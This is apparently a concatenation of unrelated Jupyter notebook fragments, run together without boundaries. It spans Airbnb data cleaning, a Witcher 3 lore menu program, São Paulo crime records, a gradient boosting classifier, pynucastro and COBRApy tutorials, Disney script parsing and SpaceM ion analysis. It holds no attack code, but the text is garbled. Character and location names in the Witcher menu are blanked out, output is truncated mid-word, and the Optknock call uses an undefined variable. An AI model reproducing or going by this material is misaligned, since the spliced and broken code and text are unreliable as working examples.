labels=['0-79/100', '80-94/100', '95-100/100'], na_label='no reviews')Cancelation Policydf.cancellation_policy.value_counts() # Replacing categories df.cancellation_policy.replace({ 'super_strict_30': 'strict_14_with_grace_period', 'super_strict_60': 'strict_14_with_grace_period', 'strict': 'strict_14_with_grace_period', 'luxury_moderate': 'moderate' }, inplace=True) df.drop(['number_of_reviews_ltm'], axis=1, inplace=True) df.drop('host_since', axis=1, inplace=True) # df.drop('amenities', axis=1, inplace=True) df.host_is_superhost.value_counts() df.info(verbose=True,null_counts=True, ) df.fillna(0, inplace=True) df.rename(columns={'neighbourhood_cleansed':'borough'},inplace=True) df.info(verbose=True,null_counts=True, ) df.to_csv('/content/drive/My Drive/data/processed_data/processed.csv') df_dummies=pd.get_dummies(df) # df_dummies.to_csv('/content/drive/My Drive/data/processed_data/london_dummy.csv') df_dummies.info(verbose=True, null_counts=True) Int64Index: 84798 entries, 11551 to 39869282 Data columns (total 117 columns): host_is_superhost 84798 non-null float64 host_listings_count 84798 non-null float64 host_identity_verified 84798 non-null float64 latitude 84798 non-null float64 
longitude 84798 non-null float64 accommodates 84798 non-null int64 bathrooms 84798 non-null float64 bedrooms 84798 non-null float64 beds 84798 non-null float64 price 84798 non-null int64 security_deposit 84798 non-null int64 cleaning_fee 84798 non-null int64 gue[...]Profile Final Data Set!pip install pandas-profiling[notebook,html] from pandas_profiling import ProfileReport profile = ProfileReport(df_dummies) profile.to_file('/content/drive/My Drive/data/london-pp.html')Interactive Menu with Python - Witcher 3 Lore Author: 1st Data Science Roadmap challenge of the "Trilhas" program offered by "Inova Mararanhão" and the State government of Maranhão, Brazil ![133845-games-review-the-witcher-3-wild-hunt-review-image1-07yik9ul5s.jpg](data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAUDBAQEAwUEBAQFBQUGBwwIBwcHBw8LCwkMEQ8SEhEPERETFhwXExQaFRERGCEYGh0dHx8fExciJCIeJBweHx7/2wBDAQUFBQcGBw4ICA4eFBEUHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh7/wAARCAJ2BGADAREAAhEBAxEB/8QAHAAAAQUBAQEAAAAAAAAAAAAABAECAwUGAAcI/8QAShAAAgECBQIEBAQDBgUEAAILAQIDBBEABRIhMRNBBiJRYRQycYEHI5GhFUKxUmLB0eHwJDNygvEIFkOSJVOyJjRzohc1VGN00v/EABsBAAMBAQEBAQAAAAAAAAAAAAABAgMEBQYH/8QAPREAAgIBAwIDBwQCAwACAQEJAAECEQMSITEEQVFh8BMicYGRobEywdHhBfEUI0IzUgYkYhVDcoKSssLS/9oADAMBAAIRAxEAPwD2Fy2OE9cb5sAjvNhgxtzgEdqOAYmo4Asa18NCI2Y4Yhm+AQgucA0cQcACKrE4AHi+AZIqk4VgO6R4wWA/peT6YAGWIwhUcBY3wwJ4I2kbbA3Q//) Game Story Functiondef game_story(): print(''' The Witcher 3 Game Story Please Select a menu item below [0] - Back [1] - Game Story ''') option = int(input("Enter option: ")) if option == 1: print(''' The world is in chaos. The air is thick with tension and the smoke of burnt villages. The fearsome Empire of Nilfgaard has struck again, ravaging the helpless Northern Kingdoms. The once mighty who tried to use Geralt for their own gain are now gone. In these uncertain times, no one can say what fortune holds in store, who will bring peace to the world and who will cause it only misery. But a force darker and deadlier emerges. The petty men and women commanding tin-plated armies fail to understand that their conflict is child's play compared to the Wild Hunt, the otherworldly threat which now looms. These ghastly spectral riders have for ages plagued humankind, bringing misery to the world. This time the Wild Hunt seeks one person in particular: the one individual Destiny itself bestowed upon Geralt, the one soul Geralt considers kin. ''') print("-~"*80) elif option == 0: return else: print('Invalid option. Try again.')Locations Functiondef locations(): print(''' The Witcher 3 Locations Please Select a Location in the list [0] - Back [1] - [2] - Skellige [3] - Novigrad ''') option = int(input("Enter option: ")) if option == 1: print(''' (corruption of Elder Speech: Caer a'Muirehen, meaning Keep of the Elder Sea) is an old keep where witchers of the School of the Wolf used to be trained. It is located in the mountains of Hertch the kingdom of Kaedwen, right off the Gwenllech river. The castle can only be reached by "The Witchers Trail", nicknamed "The Killer", which is easy to miss and encircles the keep. While Trials and Changes are no longer performed here, witchers still tend to rest here between their assignments—usually during the winter, after which they set out on The Path again. The keep's name is a nod to an ancient sea in the area, indicated by the presence of fossilized sea creatures embedded in the stones on which it was built. 
''') print("-~"*80) elif option == 2: print(''' Skellige, commonly referred to as the Skellige Isles or the Isles of Skellige, is an archipelago and one of the Northern Kingdoms. The group of six islands is situated in the Great Sea, off the coast of Cintra and southwest of Cidaris and Verden. It's legendary, famous for the unrivaled corsairs and swift longships that sail many seas. Its people are united under the King of the Skellige Isles, who's elected by the jarls of the seven major clans during traditional moots. In practice, however, the kings are from the same clan or at least related. Even though their relations with most of the North were always tense, to say the least, they were longtime allies of Cintra, due to the marriage between Queen Calanthe and Eist Tuirseach of Skellige. After King Eist's death in the Battle of Marnadal, the Islanders concentrated their raids on the Nilfgaardian Empire in an act of revenge. ''') elif option == 3: print(''' Novigrad is a free city within Redania and is therefore not subject to the rule of that kingdom. It is one of the major ports on the continent and populated by nearly 30,000 inhabitants, making it one of the largest cities in the North. Like any true metropolis, Novigrad has many factories and is home to all manner of craftsmen offering every ware possible and one can even find the occasional con-man or shady dealer. The city is also home to numerous banks and even has a zoo. The Eternal Fire is said to protect the city's inhabitants from all evil, monsters included. The thick city walls have never been breached, as they were tactfully designed by the architects of the Oxenfurt Academy. Novigrad is inhabited by an unusually colorful group of both permanent residents and those in town on long and short-term visits. Most eye-catching amidst the throngs of common townsfolk, stall-keepers, and craftsmen are those practicing the more roguish professions. There is no army in the city but it does have a secret service, an ever-present Temple Guard, and a powerful Temple Fleet. ''') elif option == 0: return else: print('Invalid option. Try again.')Characters Functiondef characters(): print(''' The Witcher 3 Main Characters Please Select a Character in the list [0] - Back [1] - [2] - Ciri [3] - ''') option = int(input("Enter option: ")) if option == 1: print(''' was a legendary witcher of the School of the Wolf active throughout the 13th century. He loved the sorceress Yennefer, considered the love of his life despite their tumultuous relationship, and became Ciri's adoptive father. During the Trial of the Grasses, Geralt exhibited unusual tolerance for the mutagens that grant witchers their abilities. Accordingly, Geralt was subjected to further experimental mutagens which rendered his hair white and may have given him greater speed, strength, and stamina than his fellow witchers. Despite his title, Geralt did not hail from the city of Rivia. After being left with the witchers by his mother, Visenna, he grew up in their keep of Kaer Morhen in the realm of Kaedwen. In the interest of appearing more trustworthy to potential clients, young witchers were encouraged to make up surnames for themselves by master Vesemir. As his first choice, Geralt chose "", but this choice was dismissed by Vesemir as silly and pretentious, so "Geralt" was all that remained of his chosen name. "" was a more practical alternative and Geralt even went so far as to adopt a Rivian accent to appear more authentic. 
Later, Queen Meve of Lyria knighted him for his valor in the Battle for the Bridge on the Yaruga conferring on him the formal title "of Rivia", which amused him.[1] He, therefore, became a true knight. ''') print("-~"*80) elif option == 2: print(''' (better known as Ciri), was born in 1252 or 1253,[4] and most likely during the Belleteyn holiday.[5] She was the sole princess of Cintra, the daughter of Pavetta and (who was using the alias "Duny" at the time) as well as Queen Calanthe's granddaughter. After Geralt of Rivia helped lift Duny's curse, Duny asked what reward the witcher would like and Geralt evoked the Law of Surprise, as it turned out Pavetta was pregnant with Ciri, unbeknownst to Duny. ''') elif option == 3: print(''' , born on Belleteyn in 1173, was a sorceress who lived in Vengerberg, the capital city of Aedirn. She was Geralt of Rivia's true love and a mother figure to Ciri, whom she viewed like a daughter to the point that she did everything she could to rescue the girl and keep her from harm. She helped advise King Demavend of Aedirn (though was never a formal royal advisor), a close friend of , and the youngest member of the Council of Wizards within the Brotherhood of Sorcerers. After its fall, the Lodge of Sorceresses attempted to recruit her, but they didn't see eye to eye as the Lodge wanted to advance their own political agenda by using Ciri. ''') elif option == 0: return else: print('Invalid option. Try again.')Monsters Functiondef monsters(): print(''' The Witcher 3 Monsters Please Select a Monster in the list [0] - Back [1] - Werewolf [2] - Djinn [3] - Doppler [4] - Bruxa ''') option = int(input("Enter option: ")) if option == 1: print(''' Werewolves are therianthropes who transform into wolves or half-wolves. As other such creatures, they are hardly hurt by steel but very vulnerable to silver. There are two most common ways to aquire lycanthropy: the first one through a curse[2] and the second is to simply have a werewolf parent. Being bitten by another werewolf, while popular in folk tales, gives only a very small chance of becoming one in reality[2], though it is still recommended to get magical treatment.[4] Those who are born as werewolves are able to fully control their shapeshifting abilities, while those cursed or bitten change into their werewolf form only during the full moon.[2] Those who became werewolves during their lives however are the only ones who can be cured.[3] The wolfsbane is said to mitigate the illness' symptoms. Therianthropy diseases, including lycanthropy, appeared in the world after the Conjunction of the Spheres, affecting nonhuman and early human populations alike.[2] According to Herbolth, lands in the Toina valley, also called the Dogbane, were plagued by werewolves before the Nordling colonization.[5] Werewolves have a legendary sense of smell, exceptional even amongst real wolves.[1] Lycanthropes are usually on good terms with other canines and, as one would expect, hate werecats.[2] ''') print("-~"*80) elif option == 2: print(''' Djinn, D'jinni or Djinniah[1] is the name given to an elemental genie of Air. In the short story, "The Last Wish", the first Witcher short story collection by , Dandelion released a Djinn which wreaked havoc in Rinde. It is in the same story that we learn of , a mage, who had captured numerous djinns and harnessed their powers for his own gain. Much the same as in fairy tales, Djinns are powerful creatures that are capable of great feats. 
Once captured, they are then bound to the captor and have to fulfill three wishes. Following their completion, they are free once more. ''') elif option == 3: print(''' Dopplers (also called shifters, mimics, doubles, imitators, or pavrats) are shapeshifters who can take the form of anyone or any beast they have encountered, provided it has a similar body weight. They used to live in the plateau near modern-day Novigrad but moved to the city itself after it proved to offer more possibilities of survival. ''') elif option == 4: print(''' Bruxa is a very powerful type of vampire that takes on the appearance of a dark-haired, young human, most often woman, but whose natural form is that of a large, black bat with sharp fangs and claws. It is one of few vampire species not affected by sun, the others being alps, mulas[1] and Higher Vampires.[2] Bruxae are very agile and only silver swords are effective against them. While they have sharp claws for close up attacks, they can also let out a piercing scream from further away that can send even a grown man flying through the air. Only Quen being able to counter this, although the power of the cry can even break through it in certain situations. The bruxae are in the habit of singing in their native language, especially after they drank blood, and their songs are described as silent, shrill, and sickening. Thanks to these, bruxae can manipulate and bend to their will any human by altering their dreams and turning them into horrible nightmares. ''') elif option == 0: return else: print('Invalid option. Try again.')Main Menu Functiondef main_menu(): print(''' The Witcher 3 Lore Please Select an Info in the Main Menu [0] - Exit [1] - Game Story [2] - Locations [3] - Characters [4] - Monsters ''') option = int(input('Enter option: ')) while True: if option == 0: print("Thank you! See you again next time!") return if option == 1: game_story() elif option == 2: locations() elif option == 3: characters() elif option == 4: monsters() else: print("Invalid option, please try again.") print(''' The Witcher 3 Lore Please Select an Info in the Main Menu [0] - Exit [1] - Game Story [2] - Locations [3] - Characters [4] - Monsters ''') option = int(input('Enter option: '))Calling the main menumain_menu()Análise dos Crimes no Estado de São Paulo Abaixo faço a Análise inicial do boletim de ocorrência dos últimos 10 anos do estado de São Paulo * Verificação de informação das colunas;* Verificação da qualidade dos Dados;* Primeiros insights;import pandas as pd import pandas as pd df = pd.read_csv('https://query.data.world/s/4suwdpbioxf7phmxtauxqsq0k', encoding = 'latin1') df.head() #Verificando tipo dados das colunas df.info() #Sera que temos boletins inclusive desse ano ? df['ANO_BO'].max() #Verificando variáveis que podem conter tipos de crimes df['RUBRICA'].head() #Excelente, vamos quer quantos tipos de crimes diferentes temos aqui registrados : df['RUBRICA'].nunique() #E agora vamos ver quais são df['RUBRICA'].unique()Sempre tive interesse em investigar todos os crimes diretamente ligados ao tráfico de drogas. Acima posso ver quais são esses.artigo_12 = df[df['RUBRICA']== 'Tráfico de entorpecente (Art. 
12)'] artigo_12.head() #Vendo as características do novo dataframe artigo_12.info() artigo_12['DESDOBRAMENTO'].nunique() artigo_12 artigo_12['ANO_BO'].max()Gradient Boosting Classifier (GBC)#Importing necessary libraries import numpy as np import pandas as pd import pickle from sklearn.model_selection import train_test_split from sklearn.preprocessing import StandardScaler from sklearn.decomposition import PCA from sklearn.pipeline import Pipeline from sklearn.pipeline import make_pipeline from sklearn.ensemble import GradientBoostingClassifier from sklearn.metrics import classification_report, confusion_matrix, accuracy_score import matplotlib.pyplot as plt import seaborn as sns #Taking the EDA data with open('../EDA/EDA.pickle', 'rb') as data: df = pickle.load(data) #Initial values of dataset df.head() #Shape of dataset df.shape #Lable mapping label_mapping = {'NEGATIVE': 0, 'NEUTRAL': 1, 'POSITIVE': 2} #Function for creating train test split def preprocess_inputs(df): df = df.copy() df['label'] = df['label'].replace(label_mapping) y = df['label'].copy() X = df.drop('label', axis=1).copy() X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.7, random_state=123) return X_train, X_test, y_train, y_test X_train, X_test, y_train, y_test = preprocess_inputs(df) print('Shape of Training Dataset:',X_train.shape) print('Shape of Testing Dataset:',X_test.shape) #Creating Pipeline for Random Forrest Classifer Classifier Algorithm pipeline_gbc = make_pipeline(GradientBoostingClassifier()) %%time #Fitting the model best_model=pipeline_gbc.fit(X_train, y_train) #Prediction gbc_pred = best_model.predict(X_test) # Training accuracy print("The training set accuracy is: {} ".format(accuracy_score(y_train, best_model.predict(X_train)))) # Test accuracy print("The test set accuracy is: {} %".format(accuracy_score(y_test, best_model.predict(X_test)))) # Classification report print("Classification report") print(classification_report(y_test,gbc_pred)) #Plotting the confusion matrix conf_matrix = confusion_matrix(y_test, gbc_pred) plt.figure(figsize=(12.8,6)) sns.heatmap(conf_matrix, annot=True, cmap="Blues") plt.ylabel('Predicted') plt.xlabel('Actual') plt.title('Confusion matrix') plt.savefig("../Images/ConfusionMatrix_GBC.png") #Creating dictionary for storing the accuracy details d = { 'Model': 'Gradient Boosting Classifier', 'Training Set Accuracy': accuracy_score(y_train, best_model.predict(X_train)), 'Test Set Accuracy': accuracy_score(y_test, best_model.predict(X_test)) } #Creating Data Frame df_models_gbc = pd.DataFrame(d, index=[0]) df_models_gbc #Creating pickle files for further use with open('../Models/best_gbc.pickle', 'wb') as output: pickle.dump(best_model, output) with open('../Models/df_models_gbc.pickle', 'wb') as output: pickle.dump(df_models_gbc, output)Page segmentation modes: - 0 Orientation and script detection (OSD) only. - 1 Automatic page segmentation with OSD. - 2 Automatic page segmentation, but no OSD, or OCR. - 3 Fully automatic page segmentation, but no OSD. (Default) - 4 Assume a single column of text of variable sizes. - 5 Assume a single uniform block of vertically aligned text. - 6 Assume a single uniform block of text. - 7 Treat the image as a single text line. - 8 Treat the image as a single word. - 9 Treat the image as a single word in a circle. - 10 Treat the image as a single character. - 11 Sparse text. Find as much text as possible in no particular order. - 12 Sparse text with OSD. - 13 Raw line. 
Treat the image as a single text line, bypassing hacks that are Tesseract-specific.pytesseract.image_to_string(img_cv, lang='eng', config='-psm 1')Specifying Desired Nuclei to Construct a Network The `Library` class in `pynucastro` provides a high level interface for reading files containing one or more Reaclib rates and then filtering these rates based on user-specified criteria for the nuclei involved in the reactions. We can then use the resulting rates to build a network.This example uses a Reaclib snapshot downloaded from:https://groups.nscl.msu.edu/jina/reaclib/db/library.php?action=viewsnapshots. Reading a rate snapshotThe `Library` class will look for the library file in the working directory or in the `pynucastro/library` subdirectory of the `pynucastro` package.When the constructor is supplied a file name, `pynucastro` will read the contents of this file and interpret them as Reaclib rates in either the Reaclib 1 or 2 formats. The `Library` then stores the rates from the file as `Rate` objects.%matplotlib inline import pynucastro as pyna library_file = '20180201ReaclibV2.22' mylibrary = pyna.rates.Library(library_file)Specifying Desired NucleiThis example constructs a CNO network like the one constructed from a set of Reaclib rate files in the "pynucastro usage examples" section of this documentation.This time, however, we will specify the nuclei we want in the network and allow the `Library` class to find all the rates linking only nuclei in the set we specified.We can specify these nuclei by their abbreviations in the form, e.g. "he4":all_nuclei = ["p", "he4", "c12", "n13", "c13", "o14", "n14", "o15", "n15"]Now we use the `Library.linking_nuclei()` function to return a smaller `Library` object containing only the rates that link these nuclei.We can pass `with_reverse=False` to restrict `linking_nuclei` to only include forward rates from the Reaclib library, as pynucastro does not yet implement partition functions for reverse rates.cno_library = mylibrary.linking_nuclei(all_nuclei, with_reverse=False)Now we can create a network (`PythonNetwork`, `BaseFortranNetwork`, or `StarKillerNetwork`) as:cno_network = pyna.networks.PythonNetwork(libraries=cno_library)In the above, we construct a network from a `Library` object by passing the `Library` object to the `libraries` argument of the network constructor. To construct a network from multiple libraries, the `libraries` argument can also take a list of `Library` objects.We can show the structure of the network by plotting a network diagram.cno_network.plot()Note that the above network also includes the triple-alpha rate from Reaclib. If we wanted to generate the python code to calculate the right-hand side we could next do:cno_network.write_network('network_module.py')Using the pipeline together with COBRApy functions to studying auxotrophyIn this tutorial the pipeline will suggest the reactions to knock-in to allow _E. coli_ auxotrophic for Tryptophan to grow on methane and produce Arginine. It is already known that *E. coli* can't grow on methane thus reactions should be added to give the model this functionality. So the approach is to:1. make the model iML1515 auxotrophic for Tryptophan2. add the Trp back to the medium to restore growth3. on these conditions run the analysis for growth on methane and production of Arginine 1) Make the model auxotrophic for TrpFor this some previous research is needed:- It is important to find out which genes are usually knocked-out to make a stain of *E. 
coli* auxotrophic for Trp- Then the corresponding reaction(s) that are catalyzed by the enzyme(s) encoded by the gene(s) have to be identified. For this the [BiGG database](http://bigg.ucsd.edu/) is of help. Typing the gene in there allows you to find the reactions that are associated with it.For instance in the following example, it was known that trpC is the gene that is commonly knocked out to make *E. coli* auxotrophic for Trp, therefore trpC was typed in the BiGG search bar and the first lines of the results are the followingThe model that is being used (i.e. iML1515) is not included in the result; however, the reaction associated with trpC in iML1515 can be found by following the link of the gene. In this case the first result was clicked and the following is the information on the gene-reaction association:Then, clicking on one of the two reactions, you can find on the right the list of the models in which it is found (see the red arrow in the picture below).- Once the reaction(s) corresponding to the gene KO are identified, they should be removed from the model, which should then not grow in a normal medium compositionfrom pipeline_package import import_models, input_parser, analysis import cobra data_repo = "../inputs" model_aux = import_models.get_reference_model(data_repo, '../inputs/ecoli_ch4_arg.csv') universal = import_models.get_universal_main(data_repo, '../inputs/ecoli_ch4_arg.csv') trpC = model_aux.reactions.IGPS trpC growth_wt = model_aux.optimize() growth_wt.objective_value growth_wt.fluxes['IGPS'] for i in model_aux.reactions: if i.flux <= -0.5 and "EX_" in i.id: print(i.id, i.reaction, i.flux) for i in model_aux.reactions: if i.flux >= 0.5 and "EX_" in i.id: print(i.id, i.reaction, i.flux) model_aux.remove_reactions([trpC]) growth_ko = model_aux.optimize() growth_ko.objective_valueConsiderations- Eliminating the reactions associated with trpC causes no growth on the wild-type carbon source (glucose)- Adding the amino acid, Trp in this case, to the medium should restore growth 2) Adding Trp to the medium to restore growthtrpgex = model_aux.reactions.EX_trp__L_e trpgex.bounds trpgex.lower_bound = -0.05 #inverse of the flux through the reaction KO in the wt model growth_ms = model_aux.optimize() growth_ms.objective_value3) Using the functions of the pipeline to find out which reactions should be added*E. coli* can't grow on methane, and the strain auxotrophic for Trp can't grow on it either. Therefore GapFilling is needed to find possible reaction additions.input_parser.parser('../inputs/ecoli_ch4_arg.csv', universal, model_aux) consumption = analysis.analysis_gf_sol('../inputs/ecoli_ch4_arg.csv', model_aux, universal) consumption production = analysis.dict_prod_sol('../inputs/ecoli_ch4_arg.csv', consumption, model_aux, universal) production final = analysis.cons_prod_dict('../inputs/ecoli_ch4_arg.csv', model_aux, universal, consumption, production) finalConcluding considerationsThis approach mixes some individual research into the candidate reactions to remove from the model (to generate the auxotrophic strain) with the functions of the pipeline, used to find out if the auxotrophic model can grow on a particular substrate and produce a target.
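As a quick reference, the knockout-and-rescue pattern used above boils down to a handful of plain COBRApy calls. The sketch below is only an illustration: it assumes a recent COBRApy with cobra.io.load_model, uses a small bundled demo model, and uses stand-in reaction IDs rather than the iML1515 IGPS / EX_trp__L_e setup of this notebook.
import cobra
from cobra.io import load_model

# Small bundled demo model, used only to illustrate the pattern; swap in iML1515 for the real case.
model = load_model("textbook")

# 1) Emulate the gene knockout by removing the reaction catalyzed by the KO'd gene product.
target = model.reactions.get_by_id("GND")        # stand-in for IGPS (trpC) in iML1515
model.remove_reactions([target])
print("Growth after knockout:", model.optimize().objective_value)

# 2) "Supplement the medium" by allowing uptake through the relevant exchange reaction;
#    uptake corresponds to a negative lower bound on the exchange flux.
exchange = model.reactions.get_by_id("EX_ac_e")  # stand-in for EX_trp__L_e
exchange.lower_bound = -0.05
print("Growth after supplementing:", model.optimize().objective_value)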
In principle both reaction addition and reaction removal for growth coupled production should be found, however, the module of the pipeline using Optknock has very long running times, thus the followin analysis is uncompletedfrom pipeline_package import call_Optknock ko_results = call_Optknock.full_knock_out_analysis('../inputs/ecoli_ch4_arg.csv', consumptionr, final, model_aux, universal) ko_resultsarr_copyarr_copy # INDEXING ON 2D ARRAY arr_2d = np.array([[5, 10, 15], [20, 25, 30], [40, 45, 50]]) arr_2d arr_2d.shape arr_2d[1] arr_2d[1][1] arr_2d[2][2] arr_2d[:2] arr_2d[:2][1:] arr_2d[:2,1:] # CONDITIONAL SELECTION arr = np.arange(1, 11)arrarr arr > 4 bool_arr = arr > 4 bool_arr arr[bool_arr] arr[arr > 4] arr[arr == 2] arr[arr <= 6]Convert to Title Casedef convert_to_title_case(s): return s.title() clean_name_album_artists_df['name'] = clean_name_album_artists_df['name'].apply(convert_to_title_case) clean_name_album_artists_df['album'] = clean_name_album_artists_df['album'].apply(convert_to_title_case) clean_name_album_artists_df['artists'] = clean_name_album_artists_df['artists'].apply(convert_to_title_case) clean_name_album_artists_df.head(1)Check Profanitypip install better_profanity from better_profanity import profanity def check_profanity(s): return not profanity.contains_profanity(s) profanity_name_mask = clean_name_album_artists_df['name'].apply(check_profanity) final_cleaned_df = clean_name_album_artists_df[profanity_name_mask] len(final_cleaned_df) final_cleaned_df.head(3) from sklearn.utils import shuffle final_cleaned_df = shuffle(final_cleaned_df) final_cleaned_df.head(3) final_cleaned_df.to_csv('spotify_songs_dataset.csv', index=False)import clean_txt as cltxtimport numpy as np import matplotlib.pyplot as plt import pandas as pd import osimport clean_txt as cltxt import numpy as np import matplotlib.pyplot as plt import pandas as pd import osRescuer down still has scene setup to be fixedfp = os.path.join('..\scripts', 'the_rescuers_down_under.txt') rescuer = cltxt.clean_txt(fp,['[',']']) rescuer['line_stemmed'] = rescuer['lines'].apply(cltxt.clean_lines) rescuer['scene_setup_stemmed'] = rescuer['scene_setup'].apply(cltxt.clean_lines) # out_path = os.path.join('..\cleaned_scripts', 'aladdin.csv') # rescuer.to_csv(out_path) rescuer fp = os.path.join('..\scripts', 'aladdin.txt') aladdin = cltxt.clean_txt(fp,['(',')']) aladdin['line_stemmed'] = aladdin['lines'].apply(cltxt.clean_lines) aladdin['scene_setup_stemmed'] = aladdin['scene_setup'].apply(cltxt.clean_lines) out_path = os.path.join('..\cleaned_scripts', 'aladdin.csv') aladdin.to_csv(out_path) aladdin.head() fp = os.path.join('..\scripts', 'the_hunchback_of_notre_dame.txt') hunchback = cltxt.clean_txt(fp,['(',')']) hunchback['line_stemmed'] = hunchback['lines'].apply(cltxt.clean_lines) hunchback['scene_setup_stemmed'] = hunchback['scene_setup'].apply(cltxt.clean_lines) out_path = os.path.join('..\cleaned_scripts', 'the_hunchback_of_notre_dame.csv') hunchback.to_csv(out_path) hunchback fp = os.path.join('..\scripts', 'beauty_and_the_beast.txt') bb = cltxt.clean_txt(fp,['(',')']) bb['line_stemmed'] = bb['lines'].apply(cltxt.clean_lines) bb['scene_setup_stemmed'] = bb['scene_setup'].apply(cltxt.clean_lines) out_path = os.path.join('..\cleaned_scripts', 'beauty_and_the_beast.csv') bb.to_csv(out_path) bb fp = os.path.join('..\scripts', 'aladdin.txt') # os.listdir('scripts') chars = [] words = [] scene_setup = [] scene = False new_char = True def get_scene_setup(string): ''' get scence setup ''' s = string scene_setup = 
s[s.find("("):s.find(")")+1] return scene_setup def remove_scene_setup(string): ''' get scence setup ''' s = string scene_setup = s[s.find("("):s.find(")")+1] s = string.replace(scene_setup, ' ') return s line_nums = [] with open(fp, 'r', encoding='utf-8') as infile: for num_l, line in enumerate(infile): num_l += 1 s = line if not new_char: if ':' in line and ' ' not in line: pass else: words[-1] += line if ':' in line: if ' ' in line: words[-1] += line continue line_nums += [num_l] words += [line.split(':')[1]] chars += [line.split(':')[0]] new_char = False df = pd.DataFrame() chars_words = np.array(list(zip(chars, words,line_nums))) draft = pd.DataFrame(chars_words,columns = ['chars','lines','line_num']) # 2) put lines into a df & store it # 3) draft['scene_setup'] = draft.lines.apply(get_scene_setup) draft['mod_lines'] = draft.lines.apply(remove_scene_setup) draft fp = os.path.join('..\scripts', 'beauty_and_the_beast.txt') # os.listdir('scripts') chars = [] words = [] scene_setup = [] scene = False new_char = True line_nums = [] with open(fp, 'r', encoding='utf-8') as infile: for num_l, line in enumerate(infile): num_l += 1 s = line if not new_char: if ':' in line and ' ' not in line: pass else: words[-1] += line if ':' in line: if ' ' in line: words[-1] += line continue line_nums += [num_l] words += [line.split(':')[1]] chars += [line.split(':')[0]] new_char = False df = pd.DataFrame() chars_words = np.array(list(zip(chars, words,line_nums))) draft = pd.DataFrame(chars_words,columns = ['chars','lines','line_num']) # 2) put lines into a df & store it # 3) draft['scene_setup'] = draft.lines.apply( cltxt.get_scene_setup,args= (['(',')']) ) draft['mod_lines'] = draft.lines.apply(cltxt.remove_scene_setup, args = (['(',')'])) draft['new'] = draft['mod_lines'].apply(cltxt.clean_lines) draft['new_cl'] = draft['scene_setup'].apply(cltxt.clean_lines) draft fp = os.path.join('..\scripts', 'the_hunchback_of_notre_dame.txt') # os.listdir('scripts') chars = [] words = [] scene_setup = [] scene = False new_char = True def get_scene_setup(string): ''' get scence setup ''' s = string scene_setup = s[s.find("("):s.find(")")+1] return scene_setup def remove_scene_setup(string): ''' get scence setup ''' s = string scene_setup = s[s.find("("):s.find(")")+1] s = string.replace(scene_setup, ' ') return s line_nums = [] with open(fp, 'r', encoding='utf-8') as infile: for num_l, line in enumerate(infile): num_l += 1 # print(line) s = line # get scene setup if not new_char: if ':' in line and ' ' not in line: pass else: words[-1] += line if ':' in line: # The problem with this is that its only applied for # scripts with in-line lines with characters if ' ' in line: words[-1] += line continue line_nums += [num_l] words += [line.split(':')[1]] chars += [line.split(':')[0]] new_char = False df = pd.DataFrame() # np.array(chars).shape # np.array(words).shape chars_words = np.array(list(zip(chars, words,line_nums))) draft = pd.DataFrame(chars_words,columns = ['chars','lines','line_num']) # 2) put lines into a df & store it # 3) draft['scene_setup'] = draft.lines.apply(get_scene_setup) draft['mod_lines'] = draft.lines.apply(remove_scene_setup) draft fp = os.path.join('..\scripts', 'the_rescuers_down_under.txt') chars = [] words = [] scene_setup = [] scene = False new_char = True def get_scene_setup(string): ''' get scence setup ''' s = string scene_setup = s[s.find("["):s.find("]")+1] return scene_setup def remove_scene_setup(string): ''' get scence setup ''' s = string scene_setup = s[s.find("["):s.find("]")+1] s = 
string.replace(scene_setup, ' ') return s line_nums = [] with open(fp, 'r', encoding='utf-8') as infile: # print(infile.readlines()) for num_l, line in enumerate(infile): num_l += 1 # print(line) s = line # get scene setup if not new_char: if ':' in line and ' ' not in line: pass else: words[-1] += line if ':' in line: if ' ' in line: words[-1] += line continue line_nums += [num_l] words += [line.split(':')[1]] chars += [line.split(':')[0]] new_char = False df = pd.DataFrame() # np.array(chars).shape # np.array(words).shape chars_words = np.array(list(zip(chars, words,line_nums))) draft = pd.DataFrame(chars_words,columns = ['chars','lines','line_num']) # 2) put lines into a df & store it # 3) draft['scene_setup'] = draft.lines.apply(get_scene_setup) draft['mod_lines'] = draft.lines.apply(remove_scene_setup) draftPixel analysis part 4 Open filtered AnnData, run clustering and do differential expression analysis Set paths Input`data_dir`: general root dir for storing data, including downloaded Metaspace datasets and plots `normalized_dataset_path`: path to the dataset, which was filtered and normalized as the first steps of single-cell analysis Output`plots_path`: directory for plots (ion images, cell masks, plots from scanpy analysis)data_dir = Path(r"/Users/alberto-mac/EMBL_ATeam/projects/gastrosome") proj_dir = "Drug_W8_new_alyona" plots_path = data_dir / proj_dir/ "plots" plots_path.mkdir(parents=True, exist_ok=True) sc.settings.figdir = plots_path plt.rcParams['savefig.facecolor']='white' normalized_dataset_path = data_dir / proj_dir / "normalized_dataset.h5ad" # normalized_dataset_path = data_dir / "single_cell_analysis" / "normalized_dataset_filter_low_ions.h5ad" cond_col = "marked_cells"Open and view normalized datasetadata = sc.read(normalized_dataset_path)Do differential expression analysis Aim: find ions, which have different intensity in different clusters or groups of cells. There are tons of articles and tutorials about DE in RNAseq and scRNAseq, so I will only comment on the differences.- In RNAseq data is descrete (counts) while in SpaceM data is continuous (intensity). In addition, it is not possible to measure intensities between 0 and some threshold (around 100 - 200 in raw ion intensity units), which results in kind of "truncated" distributions with large proportion of zeros for low-intensity ions. For small metabolite negative mode datasets most of intracellular ions have very low intensity. All this means that before using some complicated method designed for scRNAseq it's worth checking if statistical assumptions of the test are at least partially met.- In Scanpy there are several methods for differential expression analysis. I think that since distributions are not normal in our case, the best option is using Wilcoxon test.- Scanpy calculates fold change as median of intensity distribution for one condition divided by the median of the other condition. For ions with a lot of zeros it can give strange result, so I found it more useful to calculate fold change and do statistical testing only between non-zero part of distributions. It was done also for scRNAseq, with arguable (as always with DE testing) results.- With Wilcoxon test any difference will be significant if we compare more than a thousand samples against another thousand, so all p-values will be super small and largely noninformative. Getting realistic p-values would require creating statistical test, which is based exactly on the distributions that we have. 
